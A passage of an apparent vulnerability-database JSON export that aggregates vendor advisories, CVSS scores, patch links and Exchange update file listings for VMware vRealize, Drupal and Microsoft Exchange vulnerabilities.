Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) \n\nThe vRealize Operations Manager API contains an arbitrary file write vulnerability. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of 7.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-30T00:00:00", "type": "vmware", "title": "VMware vRealize Operations updates address Server Side Request Forgery and Arbitrary File Write vulnerabilities (CVE-2021-21975, CVE-2021-21983)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-08-24T00:00:00", "id": "VMSA-2021-0004.2", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0004.2.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "debian": [{"lastseen": "2021-10-22T11:42:09", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2458-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Emilio Pozuelo Monfort\nNovember 19, 2020 https://wiki.debian.org/LTS\n- 
-------------------------------------------------------------------------\n\nPackage : drupal7\nVersion : 7.52-2+deb9u12\nCVE ID : CVE-2020-13666 CVE-2020-13671\n\nTwo vulnerabilities were discovered in Drupal, a fully-featured content\nmanagement framework.\n\nCVE-2020-13666\n\n The Drupal AJAX API did not disable JSONP by default, which could\n lead to cross-site scripting.\n\n For setups that relied on Drupal's AJAX API for JSONP requests,\n either JSONP will need to be reenabled, or the jQuery AJAX API will\n have to be used instead.\n\n See the upstream advisory for more details:\n https://www.drupal.org/sa-core-2020-007\n\nCVE-2020-13671\n\n Drupal failed to sanitize filenames on uploaded files, which could\n lead to those files being served as the wrong MIME type, or being\n executed depending on the server configuration.\n\n It is also recommended to check previously uploaded files for\n malicious extensions. For more details see the upstream advisory:\n https://www.drupal.org/sa-core-2020-012\n\nFor Debian 9 stretch, these problems have been fixed in version\n7.52-2+deb9u12.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFor the detailed security status of drupal7 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/drupal7\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-19T11:47:17", "type": "debian", "title": "[SECURITY] [DLA 2458-1] drupal7 
security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13666", "CVE-2020-13671"], "modified": "2020-11-19T11:47:17", "id": "DEBIAN:DLA-2458-1:75B9A", "href": "https://lists.debian.org/debian-lts-announce/2020/11/msg00035.html", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2023-06-05T15:04:23", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-27T01:12:43", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: drupal7-7.74-1.fc32", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13666", "CVE-2020-13671"], "modified": "2020-11-27T01:12:43", "id": "FEDORA:AB27730C937D", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/L2D45GBUHJGSTS7WGZQZN22TVI6SSON7/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T15:04:23", "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-27T01:24:16", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: drupal7-7.74-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13666", "CVE-2020-13671"], "modified": "2020-11-27T01:24:16", "id": "FEDORA:122DA30CBB2E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/Y663FLPIX3Z3GFILDR2PBK76EFS432DO/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T18:35:35", "description": "Drupal is an open source content management platform powering millions of websites and applications. It's built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-15T01:22:18", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: drupal8-8.9.11-1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13666", "CVE-2020-13667", "CVE-2020-13668", "CVE-2020-13669", "CVE-2020-13670", "CVE-2020-13671", "CVE-2020-28948", "CVE-2020-28949"], "modified": "2020-12-15T01:22:18", "id": "FEDORA:C13D4309CBA7", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KWM4CTMEGAC4I2CHYNJVSROY4CVXVEUT/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T18:35:35", "description": "Drupal is an open source content management platform powering millions of websites and applications. It's built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-15T01:41:04", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: drupal8-8.9.11-1.fc32", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13666", "CVE-2020-13667", "CVE-2020-13668", "CVE-2020-13669", "CVE-2020-13670", "CVE-2020-13671", "CVE-2020-28948", "CVE-2020-28949"], "modified": "2020-12-15T01:41:04", "id": "FEDORA:22650309BA59", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/5KSFM672XW3X6BR7TVKRD63SLZGKK437/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "msrc": [{"lastseen": "2023-05-23T15:35:29", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. 
Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:C28CD823FBB321014DB6D53A28DA0CD1", "href": "/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2023-05-27T14:59:05", "description": "### *Detect date*:\n07/13/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Exchange Server. Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. 
Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMicrosoft Exchange Server 2019 Cumulative Update 10 \nMicrosoft Exchange Server 2019 Cumulative Update 9 \nMicrosoft Exchange Server 2013 Cumulative Update 23 \nMicrosoft Exchange Server 2016 Cumulative Update 20 \nMicrosoft Exchange Server 2019 Cumulative Update 8 \nMicrosoft Exchange Server 2016 Cumulative Update 19 \nMicrosoft Exchange Server 2016 Cumulative Update 21\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31196](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31196>) \n[CVE-2021-34470](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34470>) \n[CVE-2021-31206](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31206>) \n[CVE-2021-34473](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34473>) \n[CVE-2021-34523](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34523>) \n[CVE-2021-33766](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33766>) \n[CVE-2021-33768](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33768>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Exchange Server](<https://threats.kaspersky.com/en/product/Microsoft-Exchange-Server/>)\n\n### *CVE-IDS*:\n[CVE-2021-31196](<https://vulners.com/cve/CVE-2021-31196>)6.5High \n[CVE-2021-34470](<https://vulners.com/cve/CVE-2021-34470>)5.2High \n[CVE-2021-31206](<https://vulners.com/cve/CVE-2021-31206>)7.5Critical \n[CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>)7.5Critical \n[CVE-2021-33766](<https://vulners.com/cve/CVE-2021-33766>)5.0Critical \n[CVE-2021-33768](<https://vulners.com/cve/CVE-2021-33768>)5.2High\n\n### *KB 
list*:\n[5001779](<http://support.microsoft.com/kb/5001779>) \n[5004780](<http://support.microsoft.com/kb/5004780>) \n[5004778](<http://support.microsoft.com/kb/5004778>) \n[5004779](<http://support.microsoft.com/kb/5004779>) \n[5003611](<http://support.microsoft.com/kb/5003611>) \n[5003612](<http://support.microsoft.com/kb/5003612>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "kaspersky", "title": "KLA12224 Multiple vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-33766", "CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-07-30T00:00:00", "id": "KLA12224", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12224/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2023-05-19T10:46:24", "description": "None\n**Important: **Please install the May 2021 security update. That update supersedes this security fix. 
For more information, see the following Exchange Team Blog article:\n\n * [Released: May 2021 Exchange Server Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)\n\nThis security update rollup resolves vulnerabilities in Microsoft Exchange Server. To learn more about these vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):\n\n * [CVE-2021-28480 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-28480>)\n * [CVE-2021-28481 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-28481>)\n * [CVE-2021-28482 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-28482>)\n * [CVE-2021-28483 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2021-28483>)\n * [CVE-2021-34473 | Microsoft Exchange Server Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>)\n * [CVE-2021-34523 | Microsoft Exchange Server Elevation of Privilege Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>)\n * [CVE-2021-33766 | Microsoft Exchange Server Information Disclosure Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>)\n\n## Known issues in this update\n\n * **Known issue 1** \n \nWhen you try to manually install this security update by double-clicking the update file (.msp) to run it in Normal mode (that is, not as an administrator), some files are not correctly updated. When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. 
However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) might stop working. \n \nThis issue occurs on servers that are using User Account Control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services. To avoid this issue, follow these steps to manually install this security update.\n\n**Note: **This issue does not occur if you install the update through Microsoft Update.\n\n 1. Select **Start**, and type **cmd**.\n 2. In the results, right-click **Command Prompt**, and then select **Run as administrator**.\n 3. If the **User Account Control** dialog box appears, verify that the default action is the action that you want, and then select **Continue**.\n 4. Type the full path of the .msp file, and then press Enter.\n**Notes: **\n * Exchange services might remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition might occur if the service control scripts experience a problem when they try to return Exchange services to their usual state. \n \nTo fix this issue, use Services Manager to restore the startup type to **Automatic**, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see [Start a Command Prompt as an Administrator](<https://technet.microsoft.com/en-us/library/cc947813\\(v=ws.10\\).aspx>).\n * When you block third-party cookies in a web browser, you may be continually prompted to trust a particular add-in even though you keep selecting the option to trust it. This issue occurs also in privacy window modes (such as InPrivate mode in Microsoft Edge). This issue occurs because browser restrictions prevent the response from being recorded. 
To record the response and enable the add-in, you must enable third-party cookies for the domain that's hosting OWA or Office Online Server in the browser settings. To enable this setting, refer to the specific support documentation for the browser.\n * **Known issue 2** \n \nAfter you install the Exchange Server April security update, cmdlets that are run through the Exchange Management Shell by using an invoked runspace might fail and return the following error message: \n\n**Note: **The syntax is not supported by this runspace. This can occur if the runspace is in no-language mode. \n\nFor more information, see [\u201cThe syntax is not supported by this runspace\u201d error after installing April 2021 Exchange security update (or later updates)](<https://support.microsoft.com/en-us/topic/-the-syntax-is-not-supported-by-this-runspace-error-after-installing-april-2021-exchange-security-update-ac2d4e97-62f6-4ad4-9dbb-0ade9b79f599>)\n * **Known issue 3** \n \nRequesting free/busy information for a user in a different forest in a trusted cross-forest topology might fail and return the following Autodiscover error message: \n\n**Note: **The remote server returned an error: (400) Bad Request.\n\nFor more information, see [\"(400) Bad Request\" error during Autodiscover for per-user free/busy in a trusted cross-forest topology](<https://support.microsoft.com/en-us/topic/-400-bad-request-error-during-autodiscover-for-per-user-free-busy-in-a-trusted-cross-forest-topology-a1d6296b-1b2b-4ecd-9ab6-d8637fe20a21>)\n * **Known issue 4** \n \nAdministrator or Service accounts that end in a dollar sign character ($) might fail when they try to connect to Exchange Management Shell or EAC. The only workaround at this time is to use accounts that don't have a dollar sign at the end of the name.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. 
When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB5001779>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center.\n\n * [Download Security Update For Exchange Server 2019 Cumulative Update 9 (KB5001779)](<https://www.microsoft.com/download/details.aspx?familyid=5aa2aaf7-860d-4977-acd4-82096c83c5f0>)\n * [Download Security Update For Exchange Server 2019 Cumulative Update 8 (KB5001779)](<https://www.microsoft.com/download/details.aspx?familyid=93809dc0-0265-4116-bc51-510ce641008b>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 20 (KB5001779)](<https://www.microsoft.com/download/details.aspx?familyid=b13f23a9-5603-4b13-8e16-6d35b5b33524>)\n * [Download Security Update For Exchange Server 2016 Cumulative Update 19 (KB5001779)](<https://www.microsoft.com/download/details.aspx?familyid=52da6d67-e0c4-4af0-a133-1e47217b6309>)\n * [Download Security Update For Exchange Server 2013 Cumulative Update 23 (KB5001779)](<https://www.microsoft.com/download/details.aspx?familyid=f827ff3b-194c-4470-aa8f-6cedc0d95d07>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: April 13, 2021](<https://support.microsoft.com/help/5001866>).\n\n### Security update replacement information\n\nThis security update replaces the following previously released updates:\n\n * [Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: March 2, 2021 
(KB5000871)](<https://support.microsoft.com/help/5000871>)\n\n## File information\n\n### File hash information\n\nUpdate name| File name| | SHA1 hash| SHA256 hash \n---|---|---|---|--- \nExchange Server 2019 Cumulative Update 9| Exchange2019-KB5001779-x64-en.msp| | 6BF217B876381DB769BA8D4EF8FE2F1739841BDE| 557245D2B52C708A193DAAB46D35CA1683DCF1F651CC362B53DC6D7CAEB0E2F9 \nExchange Server 2019 Cumulative Update 8| Exchange2019-KB5001779-x64-en.msp| | B228041E258836DCC03B16B485DC7AA4FDDE7DC0| 58DC3AEA33E5014BCE03FC905FA59332B5C1E673F9195C646AF5F1541E33AF87 \nExchange Server 2016 Cumulative Update 20| Exchange2016-KB5001779-x64-en.msp| | 6481BC6EE060541641EE21F0368F45563C03CFD8| F428F4F667539E1D7D2F7FC5A526E699D86718990622F8724E0258F4B4107518 \nExchange Server 2016 Cumulative Update 19| Exchange2016-KB5001779-x64-en.msp| | 0368F19923C70B1824297FD333D056B5CB20AF37| 7A2DF56EC99A6DF13258360DF79C01713C19AA0D35A33FB1FC8DC2CB12669123 \nExchange Server 2013 Cumulative Update 23| Exchange2013-KB5001779-x64-en.msp| | CC0DAAE493A268E495CA7B547CB1EA2A5A7A0556| 2987759DFEDA4A2E7FCEC234938E1629A288D097E585BAAEEF40C5982DFE709A \n \n### Exchange server file information\n\nThe English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. 
Additionally, the dates and times may change when you perform certain operations on the files.

#### Microsoft Exchange Server 2019 Cumulative Update 9

File name| File version| File size| Date| Time| Platform
---|---|---|---|---|---
Activemonitoringeventmsg.dll| 15.2.858.9| 71,048| 04-Apr-2021| 08:28| x64
Activemonitoringexecutionlibrary.ps1| Not applicable| 29,522| 04-Apr-2021| 08:33| Not applicable
Adduserstopfrecursive.ps1| Not applicable| 14,969| 04-Apr-2021| 08:38| Not applicable
Ademodule.dll| 15.2.858.9| 106,392| 04-Apr-2021| 08:29| x64
Airfilter.dll| 15.2.858.9| 42,872| 04-Apr-2021| 08:33| x64
Ajaxcontroltoolkit.dll| 15.2.858.9| 92,568| 04-Apr-2021| 08:28| x86
Antispamcommon.ps1| Not applicable| 13,505| 04-Apr-2021| 08:38| Not applicable
Asdat.msi| Not applicable| 5,087,232| 04-Apr-2021| 08:35| Not applicable
Asentirs.msi| Not applicable| 77,824| 04-Apr-2021| 08:33| Not applicable
Asentsig.msi| Not applicable| 73,728| 04-Apr-2021| 08:35| Not applicable
Bigfunnel.bondtypes.dll| 15.2.858.9| 45,464| 04-Apr-2021| 08:33| x86
Bigfunnel.common.dll| 15.2.858.9| 66,440| 04-Apr-2021| 08:30| x86
Bigfunnel.configuration.dll| 15.2.858.9| 118,152| 04-Apr-2021| 08:31| x86
Bigfunnel.entropy.dll| 15.2.858.9| 44,424| 04-Apr-2021| 08:30| x86
Bigfunnel.filter.dll| 15.2.858.9| 54,160| 04-Apr-2021| 08:43| x86
Bigfunnel.indexstream.dll| 15.2.858.9| 68,992| 04-Apr-2021| 08:32| x86
Bigfunnel.neuraltree.dll| Not applicable| 694,168| 04-Apr-2021| 08:30| x64
Bigfunnel.neuraltreeranking.dll| 15.2.858.9| 19,864| 04-Apr-2021| 08:31| x86
Bigfunnel.poi.dll| 15.2.858.9| 245,128| 04-Apr-2021| 08:33| x86
Bigfunnel.postinglist.dll| 15.2.858.9| 189,320| 04-Apr-2021| 08:37| x86
Bigfunnel.query.dll| 15.2.858.9| 101,248| 04-Apr-2021| 08:43| x86
Bigfunnel.ranking.dll| 15.2.858.9| 109,448| 04-Apr-2021| 08:36| x86
Bigfunnel.syntheticdatalib.dll| 15.2.858.9| 3,634,568| 04-Apr-2021| 08:43| x86
Bigfunnel.tracing.dll| 15.2.858.9| 42,880| 04-Apr-2021| 08:31| x86
Bigfunnel.wordbreakers.dll| 15.2.858.9| 46,472| 04-Apr-2021| 08:33| x86
Cafe_airfilter_dll| 15.2.858.9| 42,872| 04-Apr-2021| 08:33| x64
Cafe_exppw_dll| 15.2.858.9| 83,352| 04-Apr-2021| 08:39| x64
Cafe_owaauth_dll| 15.2.858.9| 92,040| 04-Apr-2021| 08:39| x64
Calcalculation.ps1| Not applicable| 42,097| 04-Apr-2021| 08:39| Not applicable
Checkdatabaseredundancy.ps1| Not applicable| 94,606| 04-Apr-2021| 08:39| Not applicable
Chksgfiles.dll| 15.2.858.9| 57,216| 04-Apr-2021| 08:39| x64
Citsconstants.ps1| Not applicable| 15,805| 04-Apr-2021| 08:36| Not applicable
Citslibrary.ps1| Not applicable| 82,680| 04-Apr-2021| 08:36| Not applicable
Citstypes.ps1| Not applicable| 14,464| 04-Apr-2021| 08:36| Not applicable
Classificationengine_mce| 15.2.858.9| 1,693,576| 04-Apr-2021| 08:27| Not applicable
Clusmsg.dll| 15.2.858.9| 134,024| 04-Apr-2021| 08:41| x64
Coconet.dll| 15.2.858.9| 48,008| 04-Apr-2021| 08:31| x64
Collectovermetrics.ps1| Not applicable| 81,684| 04-Apr-2021| 08:39| Not applicable
Collectreplicationmetrics.ps1| Not applicable| 41,870| 04-Apr-2021| 08:38| Not applicable
Commonconnectfunctions.ps1| Not applicable| 29,931| 04-Apr-2021| 08:33| Not applicable
Complianceauditservice.exe| 15.2.858.10| 39,832| 04-Apr-2021| 08:39| x86
Configureadam.ps1| Not applicable| 22,804| 04-Apr-2021| 08:35| Not applicable
Configurecaferesponseheaders.ps1| Not applicable| 20,348| 04-Apr-2021| 08:38| Not applicable
Configurecryptodefaults.ps1| Not applicable| 42,035| 04-Apr-2021| 08:39| Not applicable
